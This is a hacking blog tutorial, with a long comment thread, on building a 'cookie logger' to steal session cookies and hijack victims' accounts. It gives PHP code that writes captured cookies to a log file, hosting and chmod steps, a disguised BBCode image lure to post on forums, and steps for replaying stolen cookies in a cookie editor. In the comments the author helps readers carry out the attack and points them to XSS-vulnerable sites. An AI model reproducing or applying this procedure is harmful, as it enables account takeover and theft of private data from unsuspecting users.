How to hack into an email account - cookie logger


Well one of the question which is asked most to me is,"How to hack into an email account",So today i am posting a new way to hack into an email account,I am not posting this post to exite hackers but to make you aware of whats going around.

Note: This Method Will Only work, if the target Site is Vulnerable to xss.

Cookies stores all the necessary Information about one’s account , using this information you can hack anybody’s account and change his password. If you get the Cookies of the Victim you can Hack any account the Victim is Logged into i.e. you can hack Google, Yahoo, Orkut, Facebook, Flickr etc.
What is a CookieLogger?

A CookieLogger is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim.

Today I am going to show How to make your own Cookie Logger

Step 1
 First you have to create a file which can capture a person's cookie.So follow the following process.

Download the script

Step 2

 Now you have to change "http://rafayhackingarticles.blogspot.com" to your your site, Remember one thing you should not upload the files into a directory.

Now open notepad and paste the script in it and save it as fun.gif

Step 3
Copy the Following Script into a Notepad File and Save the file as cookielogger.php:



$filename = “logfile.txt”;
if (isset($_GET["cookie"]))
{
if (!$handle = fopen($filename, ‘a’))
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
else
{
if (fwrite($handle, “\r\n” . $_GET["cookie"]) === FALSE)
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
fclose($handle);
exit;
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
?>


Step 4:Create a new Notepad File and Save it as logfile.txt

Upload this file to your server

cookielogger.php -> http://www.yoursite.com/cookielogger.php
logfile.txt -> http://www.yoursite.com/logfile.txt (chmod 777)
fun.gif -> http://www.yoursite.com/fun.gif

If you don’t have any Website then you can use the following Website to get a Free Website which has php support :

www.ofees.net
www.t35.com
www.ripway.com

Step 5:Go to the victim forum and insert this code in the signature or a post :


[url=http://www.yoursite.com/fun.gif][img]http://yoursite.com/fun.jpg[/img][/url]


So the person who click it will think it is fun.jpg but it redirects to fun.gif

Step 6
So if you click the image you will get a temporary error and you will find the cookie in the logfile.txt


step 7
 And something like this will be stored in your "logfile.txt"

phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; phpbb2mysql_sid=3ed7bdcb4e9e41737ed6eb41c43a4ec9



Step 8
To get the access to the Victim’s Account you need to replace your cookies with the Victim’s Cookie. You can use a Cookie Editor for this. The string before “=” is the name of the cookie and the string after “=” is its value. So Change the values of the cookies in the cookie Editor.

Now for this you will need a firefox addon named "Add and edit cookies"


Subscribe to our Newsletter and receive updates directly via email - Get Ethical hacking and security tips directly to your inbox. Alternatively you can Join our Hackers Community on Facebook , Google+ and Twitter .

At RHA Infosec we provide different types of Security Testing from small business sites to Corporate Sites. Click Here to know more about our complete list of services.

Subscribe to RHA


Enjoyed this article?
Subscribe to "Rafay Hacking Articles" and get daily updates in your inbox for free!


Tags:


Kindly Bookmark it and Share it with Friends:

53 comments :

  1. Hi :)

    I installed the Cookie Editor app but I still don't quite understand Step 8. Could you please elaborate?

    ReplyDelete
  2. @Anonymous
    Have you got victims cookies?

    ReplyDelete
  3. How to edit cookies plz suggest me!!!

    ReplyDelete
  4. The thing you mentioned above is quite tricky to understand
    step 4
    and step 8 is quite hard to understand

    ReplyDelete
  5. where is victims form ??? how to go

    do we have to upload all these 3 on our web and what is chmod where to post this or just upload in our side please answer?
    cookielogger.php -> http://www.yoursite.com/cookielogger.php
    logfile.txt -> http://www.yoursite.com/logfile.txt (chmod 777)
    fun.gif -> http://www.yoursite.com/fun.gif

    ReplyDelete
  6. @Anonymous
    Kindly tell me what dont understand in Step 4,you need to upload all three files to a web hosting service

    ReplyDelete
  7. Step 5:Go to the victim forum and insert this code in the signature or a post

    from where we get the victim forum ???? and what is (chmod 777)

    ReplyDelete
  8. yeah i don't quite get part 8, the part about putting in values(what kind of values?). changing my cookies to be their cookies makes no sense :( how would i do that.

    ReplyDelete
  9. I uploaded the files now which URL am i to use?? My site is http://h1.ripway.com/TRIDEEB1492/

    ReplyDelete
  10. can use anything other than "Edit Cookies"???

    ReplyDelete
  11. @Azri92
    Yes there are many other tools but you can google them,but this is the simplest one

    ReplyDelete
  12. @Anonymous
    The victims forum means that you can place the link on
    orkut scrapbook,facebook wall or any forum

    ReplyDelete
  13. hey dude!
    i already upload my the 3 files in my site then give the link to a forum but why does when i try to open the logfile (download) no txt or no any thing that put in it. it just empty. can u help me about this.

    ReplyDelete
  14. Got some questions.

    Say a guy clicks at your link. With a different code obviously, can you steal all of his cookies or just the cookie(s) of the page he was last in(the refferer site)? Can you even steal the passwords he might stored at his browser?

    Sorry if my questions are questions of a noobie but I'm concerned about internet safety and privacy. TY!

    ReplyDelete
  15. @Anonymous
    When the victim clicks on your link,you steal his cookies of the accounts through which the victim is logged in

    ReplyDelete
  16. step 8 question: To get the access to the Victim’s Account you need to replace your cookies with the Victim’s Cookie.*where can i find my cookies?* You can use a Cookie Editor for this. The string before “=” is the name of the cookie and the string after “=” is its value. So Change the values of the cookies in the cookie Editor.(what values am i going to substitute for the cookies?) *can u give me an example?, coz this cookie thing are new to me..*

    ReplyDelete
  17. hello dear, i am in a trouble..m not at all getting the things what u hv mentioned above in step 2.... where u hv wrote to replace 'http://rafayhackingarticles.blogspot.com' to my site...
    i dont hv any site..so which one i have to put it..?
    and again u wrote to open notepad and save it as fun.gif...
    well i am already opened it up when m editing the url...right? so why to again open another notepad? and how do i save a text file into gif (image) format..m completely confused here..will u please explain?


    then m again confused in step 5..dat victim will think its fun.jpg but it will redirects to fun.gif..?
    so please let me know it clearely..m confused..!..sorry to disturb u..[:(]

    ReplyDelete
  18. Please...I saved the script1 as fun.gif
    but when i try to open it as mywebsite.com/fun.gif
    it shows that it gots some errors
    i'm using 0fees.net
    then i renamed the file to fun.php
    then when i tried to open it in web
    it comes a blank page...and the logfile is blank too...
    please can u give me a solution for that ?
    :D thank you ! :]

    ReplyDelete
  19. i did every step very carefully but when i tried to hack my own account .. its not working ..... i saved all the files to root directory .. i just did every step the way u told... but when i posted it the way u said .. nd then when i clickd that signature or link to jpj image ... it opes a new web page as 'Adress not found' then i thought work i done .. but when i downloaded that logfile .. there was nothing in it ..

    Its not working ....
    wot to do???
    reply AS soon as possible

    nd yes i tried to hack my facebook account.. its not getting post on wall but u can message that signature...

    ReplyDelete
  20. Cookie stealing or session hijacking only work with those sites which have an xss vulnerability.

    ReplyDelete
  21. I thinks its quite simple.
    1)you create a fake site and add the script
    2)when a visitor visits your site, visitor's cookie will be copied into logfile.txt
    3)you copy the file and replace your cookie with it.
    4) so if you are able visit the site that user is currently logged in and also the cookie you just copied contains its session id then you can find your self logged in as that person


    If you are on the same subnet you can use MIM using arpspoof,hamster,ferret to gain cookie info.

    ReplyDelete
  22. Is there other way to get cookies?

    ReplyDelete
  23. Sorry i could not understand step 8 it is mentioned here "To get the access to the Victim’s Account you need to replace your cookies with the Victim’s Cookie. You can use a Cookie Editor for this. The string before “=” is the name of the cookie and the string after “=” is its value. So Change the values of the cookies in the cookie Editor." But how to get my cookie and where is it available and also how to get victims cookie and where is it available ? So, please elaborate on this .

    ReplyDelete
  24. @Anonymous
    I see you dont have basic knowledge of cookie editing and cookie capturing, I recommend you reading my book
    www.hacking-book.com

    ReplyDelete
  25. What should be the CHMOD of the fun.gif file, cause I saved it by the CHMOD of 644 and when I open it I get the code of the fun.gif file on the screen and the logfile.txt remains empty..

    Please reply, I entered the link of the fun.gif file in the url..

    ReplyDelete
  26. @Dhruv
    Kindly change the permissions of the .txt file to 777 so it can write the traced cookies

    ReplyDelete
  27. Thanx Brother...r yu pakistani???Ihv to discuss wv yu smthng really important..my mail address is fowad89@yahoo.com ...pls bro i'll b w8ing 4 ur mail....contact me asap...thanx G.B.U

    ReplyDelete
  28. Can I hack a blogspot account with this?

    ReplyDelete
  29. dude check Your script...i download it but its not working

    ReplyDelete
  30. I can't post that link in Facebook..it is marked as flagged..

    ReplyDelete
  31. I clicked the gif link myself and when i open my logfile.txt with my ftp client, its shows blank thing?

    ReplyDelete
  32. whre i'll recve the cookies dear i have done evrything as u said and sent plzz help me out!!!

    ReplyDelete
  33. i have done everything u said and upload them to my webhosting and i have changed the permissions (chmod) but nothing written in the logfile.txt
    that's what appear when i press the /fun.gif
    http://img600.imageshack.us/img600/3457/116201131423am.png

    ReplyDelete
  34. @MoSeBA
    This hack works only on the forums/blogs which are vulnerable to XSS(Cross site scripting.Try finding a website/forum vulnerable to XSS and then try it.

    ReplyDelete
  35. whre i'll recve the cookies . i have done evrything as u said and sent plzz help me out!!! how can i change the cookies or wat should be cookies place

    ReplyDelete
  36. does it work on facebook and hotmail ?

    ReplyDelete
  37. [url=http://www.127.0.0.1/fun.gif][img]http://www.127.0.0.1/fun.jpg[/img][/url]

    ReplyDelete
  38. in step 2 change "http://rafayhackingarticles.blogspot.com" to your your site. i m not getting what is my site. how can make my site. already i hacked cookies from wireshark in a same nework in which i work. i also know to hack gmail password using forge page. but i m not getting what is my site. so please explain it briefly. not in a short way.
    thanku

    ReplyDelete
  39. hi . i ve been using this (webhosting www.ripway.com) site. i ve a small problem i am not able create chmod777 log file ... could u help me with it :)

    thanks

    akram ...

    ReplyDelete
  40. hey i ve been using (www.ripway.com) but i ve got a problem in creating log file ... how do i make it chmod777 comptible???

    thanks

    akram

    ReplyDelete
  41. cookielogger.php -> http://www.yoursite.com/cookielogger.php
    logfile.txt -> http://www.yoursite.com/logfile.txt (chmod 777)
    fun.gif -> http://www.yoursite.com/fun.gif






    what is this and how can i upload it?

    ReplyDelete
  42. I have done everything u said, but i didnt get the cookie into logfile...
    If we click the signature, the error i am getting is "404 page not found"... Where could the error possibly be???
    Kindly help me with this...Thanx in Advance...

    ReplyDelete
  43. I have done whatever u said bhai... Webhosting etc everything.... Instead of a victim when i paste it in address bar it says Your search - [url=http://www.samthedevil.biz.ly/fun.gif][img]http://www.samthedevil.biz.ly/fun.jpg[/img][/url] - did not match any documents.

    ReplyDelete
  44. add and edit add ons is not available in latest firefox..any other add on

    ReplyDelete
  45. i have done all the things u told but its not working..

    ReplyDelete
  46. facebook blocks the url:
    [url=http://www.yoursite.com/fun.gif][img]http://yoursite.com/fun.jpg[/img][/url]
    what should i do?

    ReplyDelete
  47. please i dont understand all this have try it but still it not working can you please explan it very well?

    ReplyDelete
  48. code is not recording anything on the logg file

    ReplyDelete
  49. when i download the script it says the archive is corrupted or damaged

    ReplyDelete

Blog Archive

 

Recent Comments

About

Rafay Baloch is an Independent security researcher, Internet marketer, Entrepreneur and a SEO consultant, He is the founder of RHA blog and multiple other blogs. Rafay got famous after finding a Remote Code Execution bug inside PayPal for which PayPal awarded him a sum of 10,000$ Read More..

Join In!

RHA © 2013. All Rights Reserved.